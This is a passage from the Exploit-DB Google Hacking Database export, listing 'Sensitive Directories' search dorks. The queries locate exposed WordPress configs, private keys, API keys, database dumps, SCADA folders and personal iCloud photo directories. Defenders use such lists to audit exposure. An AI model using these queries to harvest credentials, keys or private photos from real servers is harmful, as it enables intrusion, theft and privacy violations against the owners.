<author>Bruno Schmid</author>
</entry>
<entry>
<id>5635</id>
<link>https://www.exploit-db.com/ghdb/5635</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;ws_ftp.log&quot;</shortDescription>
<textualDescription>Sensitive directories:
intitle:&quot;index of&quot; &quot;ws_ftp.log&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;ws_ftp.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;ws_ftp.log&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4027</id>
<link>https://www.exploit-db.com/ghdb/4027</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;wwwroot&quot;</shortDescription>
<textualDescription>Directory of wwwroot Dork. Enjoy xD.
By Rootkit.</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;wwwroot&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;wwwroot&quot;</querystring>
<edb></edb>
<date>2015-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>5122</id>
<link>https://www.exploit-db.com/ghdb/5122</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; $Recycle.bin</shortDescription>
<textualDescription>Windows trash bins with a lot of juicy info.
You can also get drive letters and folders by attaching :%5C/
before $Recycle.bin %5C is &quot;\&quot;
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; $Recycle.bin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; $Recycle.bin</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>616</id>
<link>https://www.exploit-db.com/ghdb/616</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; -inurl:htm -inurl:html mp3</shortDescription>
<textualDescription>Yes! I probably have should have told you guys earlier, but this is how ive been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it... a)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching b)a lot of the time google gives you results and they are not there thanks to good old friend 404 c)finding stuff takes a lot of practice. Goods... a)ive found whole albums b)ive mass downloaded directories of hundreds of songs that i have intrest in c)its exciting seeing the results, like fining treasure.</textualDescription>
<query>intitle:&quot;index of&quot; -inurl:htm -inurl:html mp3</query>
<querystring>https://www.google.com/search?q=intitle%3A%22index+of%22+-inurl%3Ahtm+-inurl%3Ahtml+mp3</querystring>
<edb></edb>
<date>2004-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5707</id>
<link>https://www.exploit-db.com/ghdb/5707</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; .oracle_jre_usage/</shortDescription>
<textualDescription>This dork gives you the version of Java used by the target
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; .oracle_jre_usage/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; .oracle_jre_usage/</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5706</id>
<link>https://www.exploit-db.com/ghdb/5706</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; .zshrc~ OR .zshrc OR .zshenv OR .zshenv~ -pool -public</shortDescription>
<textualDescription>Z shell (Zsh) juicy info
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; .zshrc~ OR .zshrc OR .zshenv OR .zshenv~ -pool -public</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; .zshrc~ OR .zshrc OR .zshenv OR .zshenv~ -pool -public</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5458</id>
<link>https://www.exploit-db.com/ghdb/5458</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; /config.ini</shortDescription>
<textualDescription>files containing password,sensitive info:
intitle:&quot;index of&quot; /config.ini
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; /config.ini</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /config.ini</querystring>
<edb></edb>
<date>2019-08-27</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5433</id>
<link>https://www.exploit-db.com/ghdb/5433</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; /content/admin/</shortDescription>
<textualDescription>Sensitive Directory:
intitle:&quot;index of&quot; /content/admin/
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; /content/admin/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /content/admin/</querystring>
<edb></edb>
<date>2019-08-22</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5434</id>
<link>https://www.exploit-db.com/ghdb/5434</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; /content/uploads/ -inurl:/wp-content/uploads/</shortDescription>
<textualDescription>Sensitive Directory:
intitle:&quot;index of&quot; /content/uploads/ -inurl:/wp-content/uploads/
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; /content/uploads/ -inurl:/wp-content/uploads/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /content/uploads/ -inurl:/wp-content/uploads/</querystring>
<edb></edb>
<date>2019-08-22</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6438</id>
<link>https://www.exploit-db.com/ghdb/6438</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; /lsass.exe</shortDescription>
<textualDescription>Dorks:
intitle:&quot;index of&quot; /lsass.exe
Summary:
A Google dork that gives Sensitive information about the lsass.exe
information.
--
Thanks &amp; Regards,
Prasad Lingamaiah
</textualDescription>
<query>intitle:&quot;index of&quot; /lsass.exe</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /lsass.exe</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>5412</id>
<link>https://www.exploit-db.com/ghdb/5412</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; /php4/</shortDescription>
<textualDescription>Sensitive Directory:
intitle:&quot;index of&quot; /php4/
intitle:&quot;index of&quot; /php/ inurl:/php/
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; /php4/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /php4/</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6421</id>
<link>https://www.exploit-db.com/ghdb/6421</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; /var/logs filetype:'&quot;log | txt | csv&quot;</shortDescription>
<textualDescription>*Google Dork:* intitle:&quot;index of&quot; /var/logs filetype:'&quot;log | txt | csv&quot;
Description:-
Discovers log files stored on linux servers in open directories of websites.
Sensitive information is exposed on the site.
Date:- 21st July, 2020
Exploit Author:- Siddharth Hingol
Thanks &amp; Regards,
Siddharth Hingol
</textualDescription>
<query>intitle:&quot;index of&quot; /var/logs filetype:'&quot;log | txt | csv&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /var/logs filetype:'&quot;log | txt | csv&quot;</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Siddharth Hingol</author>
</entry>
<entry>
<id>5330</id>
<link>https://www.exploit-db.com/ghdb/5330</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; admin</shortDescription>
<textualDescription>Dork: intitle&quot;index of&quot; admin
Author : Coudry Hugo
Sensitive Directories
</textualDescription>
<query>intitle:&quot;index of&quot; admin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; admin</querystring>
<edb></edb>
<date>2019-08-07</date>
<author>Coudry hugo</author>
</entry>
<entry>
<id>5712</id>
<link>https://www.exploit-db.com/ghdb/5712</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; api_key OR &quot;api key&quot; OR apiKey -pool</shortDescription>
<textualDescription>API keys
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; api_key OR &quot;api key&quot; OR apiKey -pool</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; api_key OR &quot;api key&quot; OR apiKey -pool</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>163</id>
<link>https://www.exploit-db.com/ghdb/163</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; cfide</shortDescription>
<textualDescription>This is the top level directory of ColdFusion, a powerful web development environment. This directory most likely contains sensitive information about a ColdFusion developed site.</textualDescription>
<query>intitle:&quot;Index of&quot; cfide</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3A%22Index+of%22+cfide</querystring>
<edb></edb>
<date>2004-04-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5867</id>
<link>https://www.exploit-db.com/ghdb/5867</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; cvsroot</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; cvsroot
# By using this dork, cvsroot directories with juicy information and
sometimes with exposed passwords can be found.
# Date: 31/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; cvsroot</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; cvsroot</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5960</id>
<link>https://www.exploit-db.com/ghdb/5960</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; db.frm</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; db.sql
Description: This Google dork shows juicy information about the website and
finds out publicly available *MariaDB databases* that contain sensitive
information &amp; can be exploited by the hacker.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; db.frm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; db.frm</querystring>
<edb></edb>
<date>2020-04-29</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5713</id>
<link>https://www.exploit-db.com/ghdb/5713</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; domain.key -public</shortDescription>
<textualDescription>Domains private Keys
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; domain.key -public</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; domain.key -public</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5329</id>
<link>https://www.exploit-db.com/ghdb/5329</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; drupal</shortDescription>
<textualDescription>Dork: intitle:&quot;index of &quot; Drupal
Author: Coudry hugo
Info : contains Drupal Sensitive files and information
</textualDescription>
<query>intitle:&quot;index of&quot; drupal</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; drupal</querystring>
<edb></edb>
<date>2019-08-07</date>
<author>Coudry hugo</author>
</entry>
<entry>
<id>3914</id>
<link>https://www.exploit-db.com/ghdb/3914</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;.ds_store&quot;</shortDescription>
<textualDescription>Mac OSX directories
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;.ds_store&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;.ds_store&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4765</id>
<link>https://www.exploit-db.com/ghdb/4765</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index Of&quot; intext:&quot;.Trash&quot;</shortDescription>
<textualDescription>Dorks containing trash folders on Linux/Unix machines.
Bruno Schmid
</textualDescription>
<query>intitle:&quot;Index Of&quot; intext:&quot;.Trash&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index Of&quot; intext:&quot;.Trash&quot;</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6909</id>
<link>https://www.exploit-db.com/ghdb/6909</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;client.key.pem&quot;</shortDescription>
<textualDescription># Dork: *intitle:&quot;index of&quot; intext:&quot;client.key.pem&quot;*
This google dork gives us access to sensitive data stored on servers, such
as private client and server keys.
Thank you,
Ketki Davda
</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;client.key.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;client.key.pem&quot;</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Ketki Davda</author>
</entry>
<entry>
<id>634</id>
<link>https://www.exploit-db.com/ghdb/634</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;content.ie5&quot;</shortDescription>
<textualDescription>This dork indicates the &quot;Local settings&quot; dir in most cases, and browseble server directories in general.</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;content.ie5&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22index+of%22+intext%3A%22content%2Eie5%22</querystring>
<edb></edb>
<date>2004-10-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4020</id>
<link>https://www.exploit-db.com/ghdb/4020</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index Of&quot; intext:&quot;iCloud Photos&quot; OR intext:&quot;My Photo Stream&quot; OR intext:&quot;Camera Roll&quot;</shortDescription>
<textualDescription>From: Creep Mode Baby</textualDescription>
<query>intitle:&quot;Index Of&quot; intext:&quot;iCloud Photos&quot; OR intext:&quot;My Photo Stream&quot; OR intext:&quot;Camera Roll&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index Of&quot; intext:&quot;iCloud Photos&quot; OR intext:&quot;My Photo Stream&quot; OR intext:&quot;Camera Roll&quot;</querystring>
<edb></edb>
<date>2015-06-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>5246</id>
<link>https://www.exploit-db.com/ghdb/5246</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;Includes</shortDescription>
<textualDescription>*Exploit *: This Dorks allow you to access the sensitive directories
using includes file.
*Google Dork* : intitle:&quot;index of&quot; intext:&quot;Includes&quot;
*Exploit Author*:- Deepak Joshi
</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;Includes</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;Includes</querystring>
<edb></edb>
<date>2019-06-05</date>
<author>Deepak Joshi</author>
</entry>
<entry>
<id>5251</id>
<link>https://www.exploit-db.com/ghdb/5251</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;Includes wordpress&quot;</shortDescription>
<textualDescription>Wordpress based website having sensitive directories.
Google Dork: *intitle:&quot;index of&quot; intext:&quot;Includes wordpress&quot;*
Author: Needa Petkar.
</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;Includes wordpress&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;Includes wordpress&quot;</querystring>
<edb></edb>
<date>2019-06-06</date>
<author>Needa Petkar</author>
</entry>
<entry>
<id>4021</id>
<link>https://www.exploit-db.com/ghdb/4021</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; inurl:&quot;no-ip.com&quot;</shortDescription>
<textualDescription># Exploit Title: intitle:&quot;index of&quot; inurl:&quot;no-ip.com&quot;
# Google Dork: intitle:&quot;index of&quot; inurl:&quot;no-ip.com&quot;
# Date: 17/06/2015
# Exploit Author: Sphearis
# Vendor Homepage: NA
# Software Link: NA
# Version: NA
# Tested on: ALL
# CVE : NA
This dork allows you to browse files stored on a personal server(home)
using a dynamic dns service to update server IP.
You can replace &quot;no-ip.com&quot; with any other dynamic dns hosts:
&quot;dyndns.org&quot;
&quot;ddns.net&quot;
&quot;dynamic-dns.net&quot;
&quot;dynip.com&quot;
&quot;tzo.com&quot;
And so on...</textualDescription>
<query>intitle:&quot;index of&quot; inurl:&quot;no-ip.com&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:&quot;no-ip.com&quot;</querystring>
<edb></edb>
<date>2015-06-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>6701</id>
<link>https://www.exploit-db.com/ghdb/6701</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; inurl:admin/download</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; inurl:admin/download
# Sensitive Directories
# Date: 23/11/2020
# Exploit Author: Aydın Baran Ertemir
</textualDescription>
<query>intitle:&quot;index of&quot; inurl:admin/download</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:admin/download</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Aydın Baran Ertemir</author>
</entry>
<entry>
<id>5107</id>
<link>https://www.exploit-db.com/ghdb/5107</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; inurl:documents backup</shortDescription>
<textualDescription>Backup folders containing very juicy info
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; inurl:documents backup</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:documents backup</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>794</id>
<link>https://www.exploit-db.com/ghdb/794</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; inurl:ftp (pub | incoming)</shortDescription>
<textualDescription>Adding &quot;inurl:ftp (pub | incoming)&quot; to the &quot;index.of&quot; searches helps locating ftp websites. This query can easily be narrowed further with additional keywords.</textualDescription>
<query>intitle:&quot;index of&quot; inurl:ftp (pub | incoming)</query>
<querystring>https://www.google.com/search?q=intitle%3A%22index+of%22+inurl%3Aftp+%28pub+%7C+incoming%29</querystring>
<edb></edb>
<date>2004-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>6186</id>
<link>https://www.exploit-db.com/ghdb/6186</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; inurl:ftp intext:admin</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; inurl:ftp intext:admin
Description: This google dorks lists out admin folders on ftp servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; inurl:ftp intext:admin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:ftp intext:admin</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5789</id>
<link>https://www.exploit-db.com/ghdb/5789</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; inurl:wp-json embedurl?</shortDescription>
<textualDescription>Google Dork Query to find out sensitive information for misconfigured
wordpress base servers.
Google Dork Query: *intitle:&quot;index of&quot; inurl:wp-json embedurl?*
</textualDescription>
<query>intitle:&quot;index of&quot; inurl:wp-json embedurl?</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:wp-json embedurl?</querystring>
<edb></edb>
<date>2020-03-16</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>5323</id>
<link>https://www.exploit-db.com/ghdb/5323</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; inurl:wp-json/oembed</shortDescription>
<textualDescription>#Google Dork:
intitle:&quot;Index of&quot; inurl:wp-json
intitle:&quot;Index of&quot; inurl:wp-json/oembed
#Description: contains sensitive files, links embedded with wordpress &amp; can
be used to find CORS
# Author: Tejas Jain ( https://www.linkedin.com/in/tejasjain52 )
</textualDescription>
<query>intitle:&quot;Index of&quot; inurl:wp-json/oembed</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; inurl:wp-json/oembed</querystring>
<edb></edb>
<date>2019-08-05</date>
<author>Tejas Jain</author>
</entry>
<entry>
<id>5366</id>
<link>https://www.exploit-db.com/ghdb/5366</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; login.php</shortDescription>
<textualDescription>Dork: intitle:&quot;Index of&quot; login.php
Author: Sathishshan
Info: Contains sensitive information &amp; sensitive files
</textualDescription>
<query>intitle:&quot;Index of&quot; login.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; login.php</querystring>
<edb></edb>
<date>2019-08-16</date>
<author>Sathishshan</author>
</entry>
<entry>
<id>3886</id>
<link>https://www.exploit-db.com/ghdb/3886</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; myshare</shortDescription>
<textualDescription>Google search for shared HDD directories or shared directories on servers.
Gives access to often unconsciously shared documents, programs or
sensitive information.
Also are often other directories on these drives accessible.
Dork by :
redN00ws</textualDescription>
<query>intitle:&quot;index of&quot; myshare</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; myshare</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5413</id>
<link>https://www.exploit-db.com/ghdb/5413</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; mysqli.ini</shortDescription>
<textualDescription>Sensitive Directory:
intitle:&quot;index of&quot; mysqli.ini
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; mysqli.ini</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; mysqli.ini</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5286</id>
<link>https://www.exploit-db.com/ghdb/5286</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; phpinfo.php</shortDescription>
<textualDescription># Google Dork : intitle:&quot;Index of&quot; phpinfo.php
# Author: Ayan Saha
# Date: 23.07.2019
# Tested on : Chrome,firefox.
</textualDescription>
<query>intitle:&quot;Index of&quot; phpinfo.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; phpinfo.php</querystring>
<edb></edb>
<date>2019-07-24</date>
<author>Ayan Saha</author>
</entry>
<entry>
<id>5324</id>
<link>https://www.exploit-db.com/ghdb/5324</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; phpmyadmin</shortDescription>
<textualDescription>Dork:
intitle:&quot;Index of&quot; phpmyadmin
Author:mayur parmar(th3cyb3rc0p)
Info:
Contains sensitive information
</textualDescription>
<query>intitle:&quot;Index of&quot; phpmyadmin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; phpmyadmin</querystring>
<edb></edb>
<date>2019-08-05</date>
<author>Mayur Parmar</author>
</entry>
<entry>
<id>5290</id>
<link>https://www.exploit-db.com/ghdb/5290</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; portal</shortDescription>
<textualDescription>Author = Scott FCS
Exploit Title = Public Portal Directory's
</textualDescription>
<query>intitle:&quot;Index of&quot; portal</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; portal</querystring>
<edb></edb>
<date>2019-07-26</date>
<author>Scott FCS</author>
</entry>
<entry>
<id>5289</id>
<link>https://www.exploit-db.com/ghdb/5289</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; public</shortDescription>
<textualDescription># Exploit Title: Public Folder Directories
# Google Dork: intitle:&quot;Index of&quot; public
# Author: Francis Al Victoriano
</textualDescription>
<query>intitle:&quot;Index of&quot; public</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; public</querystring>
<edb></edb>
<date>2019-07-25</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>5186</id>
<link>https://www.exploit-db.com/ghdb/5186</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; scada</shortDescription>
<textualDescription>*Google Dork:- intitle:&quot;index of&quot; scada*
*Description :- *
*Discovers Scada juicy information.*
*SCADA Sensitive Directories Expose on Site**.*
*Date :- 20th April, 2019*
*Exploit Author :- Aman Bhardwaj *
</textualDescription>
<query>intitle:&quot;index of&quot; scada</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; scada</querystring>
<edb></edb>
<date>2019-04-22</date>
<author>Aman Bhardwaj</author>
</entry>
<entry>
<id>5569</id>
<link>https://www.exploit-db.com/ghdb/5569</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; secret</shortDescription>
<textualDescription># Exploit Title: Secret Folder
# Google Dork: intitle:&quot;Index of&quot; secret
# Author: Francis Al Victoriano
</textualDescription>
<query>intitle:&quot;Index of&quot; secret</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; secret</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>5340</id>
<link>https://www.exploit-db.com/ghdb/5340</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; sql inurl:./db/</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; sql inurl:./db/
# Date: 09th AUGUST 2019
# Author: BLAY ABU SAFIAN
SENSITIVE DATABASE CREDENTIALS
</textualDescription>
<query>intitle:&quot;index of&quot; sql inurl:./db/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; sql inurl:./db/</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>BLAY ABU SAFIAN</author>
</entry>
<entry>
<id>5414</id>
<link>https://www.exploit-db.com/ghdb/5414</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; ssh2.ini</shortDescription>
<textualDescription>Sensitive Directory:
intitle:&quot;index of&quot; ssh2.ini
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; ssh2.ini</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; ssh2.ini</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5325</id>
<link>https://www.exploit-db.com/ghdb/5325</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; wp-admin</shortDescription>
<textualDescription>Dork: intitle:&quot;Index of&quot; wp-admin
Author: Sathishshan
Info: Contains wordpress sensitive information &amp; sensitive files
</textualDescription>
<query>intitle:&quot;Index of&quot; wp-admin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; wp-admin</querystring>
<edb></edb>
<date>2019-08-05</date>
<author>Sathishshan</author>
</entry>
<entry>
<id>5296</id>
<link>https://www.exploit-db.com/ghdb/5296</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; wp-config</shortDescription>
<textualDescription>Dork:
intitle:&quot;Index of&quot; wp-config
info:contains wordpress senstive files
Author:Mayur Parmar
</textualDescription>
<query>intitle:&quot;Index of&quot; wp-config</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; wp-config</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Mayur Parmar</author>
</entry>
<entry>
<id>5367</id>
<link>https://www.exploit-db.com/ghdb/5367</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; wp-config.php</shortDescription>
<textualDescription>Dork: intitle:&quot;Index of&quot; wp-config.php
Author: Sathishshan
Info: Contains sensitive information &amp; sensitive files
</textualDescription>
<query>intitle:&quot;Index of&quot; wp-config.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; wp-config.php</querystring>
<edb></edb>
<date>2019-08-16</date>
<author>Sathishshan</author>
</entry>
<entry>
<id>5297</id>
<link>https://www.exploit-db.com/ghdb/5297</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; wp-content</shortDescription>
<textualDescription>Dork:
intitle:&quot;Index of&quot; wp-content
Author:Mayur Parmar
info:
it contains wordpress sensitive information.
</textualDescription>
<query>intitle:&quot;Index of&quot; wp-content</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; wp-content</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Mayur Parmar</author>
</entry>
<entry>
<id>5605</id>
<link>https://www.exploit-db.com/ghdb/5605</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of&quot; wp-upload</shortDescription>
<textualDescription>Dork:
intitle:&quot;Index of&quot; wp-upload
intitle:&quot;Index of&quot; wp-uploads
Author:Ismail Tasdelen
Info:
it contains wordpress sensitive information.
</textualDescription>
<query>intitle:&quot;Index of&quot; wp-upload</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; wp-upload</querystring>
<edb></edb>
<date>2019-10-29</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>4077</id>
<link>https://www.exploit-db.com/ghdb/4077</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index.of&quot; &quot;attachments&quot;</shortDescription>
<textualDescription>Directories with interesting info.
Have Fun Responsible.
Dork by Rootkit Pentester.</textualDescription>
<query>intitle:&quot;Index.of&quot; &quot;attachments&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index.of&quot; &quot;attachments&quot;</querystring>
